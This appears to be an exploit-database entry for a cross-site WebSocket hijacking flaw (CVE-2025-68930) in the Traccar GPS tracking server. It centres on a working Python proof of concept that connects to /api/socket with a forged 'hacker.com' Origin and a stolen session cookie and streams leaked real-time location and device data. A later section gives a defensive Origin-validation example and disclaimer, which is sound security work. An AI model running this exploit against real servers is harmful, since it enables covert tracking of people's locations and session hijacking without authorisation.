
Traccar GPS Tracking System 6.11.1 – Cross-Site WebSocket Hijacking (CSWSH)

Categories: WebApps

Proof of Concept (PoC)

poc.py
# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930

"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket). 
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header 
along with a victim's valid JSESSIONID. This allows the attacker to hijack the 
WebSocket connection and leak real-time sensitive data, including GPS coordinates 
and device status.

Requirements:
pip install websocket-client
"""

import websocket
import argparse
import sys

def on_message(ws, message):
    print(f"[+] DATA LEAKED: {message}")

def on_error(ws, error):
    print(f"[-] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[-] Connection closed.")

def on_open(ws):
    print("[*] WebSocket Handshake Successful!")
    print("[*] Connection upgraded. Streaming real-time sensitive data...\n")

def main():
    parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
    parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
    parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
    parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")
    
    args = parser.parse_args()

    # Construct the WebSocket URL
    url = f"ws://{args.target}:{args.port}/api/socket"
    
    # Malicious headers triggering the bypass
    # The 'Origin' header is set to an external domain to demonstrate lack of validation.
    headers = [
        "Origin: http://hacker.com",
        f"Cookie: JSESSIONID={args.cookie}"
    ]

    print(f"""
    ================================================
    TRACCAR GPS TRACKER - CSWSH EXPLOIT
    Exploit Author: Hazar Taspinar
    CVE: CVE-2025-68930
    Target: {url}
    ================================================
    """)

    # Initiate WebSocket connection
    ws = websocket.WebSocketApp(url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close,
                                on_open=on_open,
                                header=headers)
    
    try:
        ws.run_forever()
    except KeyboardInterrupt:
        print("\n[*] Exploit stopped by user.")
        sys.exit(0)

if __name__ == "__main__":
    main()
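The Description above says the server never checks the Origin header on the /api/socket handshake. The block below is an added example, not Traccar's code and not part of the exploit author's PoC: it puts the permissive acceptor the advisory describes next to an allowlist check that would reject the forged `Origin: http://hacker.com` header, and it also shows why a prefix match on the origin string is not a fix. The handshake headers, the host 192.168.1.5:8082 and the `node0example` session id are constructed for the example. Two caveats worth keeping in mind: an Origin check defends only against browsers (a client that can set its own headers, like the PoC, can set Origin too, so the PoC demonstrates the missing check rather than the full cross-site attack), and whether a victim's browser actually attaches the JSESSIONID cookie to a cross-site WebSocket handshake depends on that cookie's SameSite attribute.

```python
"""
Server-side Origin validation for a WebSocket handshake (added example,
not Traccar's code). Hostnames and the session id below are constructed.
"""
from urllib.parse import urlsplit

# Constructed handshake headers, modelled on what the PoC sends.
FORGED_HANDSHAKE = {
    "Host": "192.168.1.5:8082",
    "Origin": "http://hacker.com",
    "Cookie": "JSESSIONID=node0example",  # placeholder session id
    "Upgrade": "websocket",
}

SAME_ORIGIN_HANDSHAKE = {**FORGED_HANDSHAKE, "Origin": "http://192.168.1.5:8082"}

# Classic bypass of a startswith()/endswith() origin check: the attacker
# registers a hostname that begins with the target's host.
PREFIX_BYPASS_HANDSHAKE = {**FORGED_HANDSHAKE,
                           "Origin": "http://192.168.1.5:8082.hacker.com"}

# Non-browser client (e.g. a mobile app): browsers always send Origin on a
# WebSocket handshake, so a missing header means the request is not from one.
NO_ORIGIN_HANDSHAKE = {k: v for k, v in FORGED_HANDSHAKE.items() if k != "Origin"}


def vulnerable_accept(headers):
    """Pattern the advisory describes: only the session cookie is checked."""
    return "JSESSIONID=" in headers.get("Cookie", "")


def naive_prefix_check(headers):
    """A tempting but wrong fix: string prefix match on the Origin value."""
    origin = headers.get("Origin", "")
    return origin.startswith("http://" + headers.get("Host", ""))


def origin_allowed(headers, allowed_origins=(), allow_missing_origin=False):
    """
    Accept only if Origin, parsed as scheme://authority, names this server
    exactly (port included) or is on an explicit allowlist. "null" and
    malformed origins are rejected. Whether to accept a handshake with no
    Origin at all is a policy decision exposed as allow_missing_origin.
    """
    origin = headers.get("Origin")
    if origin is None:
        return allow_missing_origin
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    authority = parts.netloc.lower()
    if authority == headers.get("Host", "").lower():
        return True
    normalized = f"{parts.scheme}://{authority}"
    return normalized in {o.lower() for o in allowed_origins}


def hardened_accept(headers, **policy):
    """Both a session cookie and an acceptable Origin are required."""
    return vulnerable_accept(headers) and origin_allowed(headers, **policy)


if __name__ == "__main__":
    for name, hs in [("forged", FORGED_HANDSHAKE),
                     ("same-origin", SAME_ORIGIN_HANDSHAKE),
                     ("prefix-bypass", PREFIX_BYPASS_HANDSHAKE),
                     ("no-origin", NO_ORIGIN_HANDSHAKE)]:
        print(f"{name:14} vulnerable={vulnerable_accept(hs)!s:5} "
              f"prefix={naive_prefix_check(hs)!s:5} hardened={hardened_accept(hs)}")
```

The comparison is done on the parsed authority rather than on the raw header string, which is what defeats the `192.168.1.5:8082.hacker.com` trick; a deployment behind a reverse proxy that serves the UI from a different hostname should list that exact `scheme://host[:port]` in `allowed_origins` instead of loosening the match.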

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
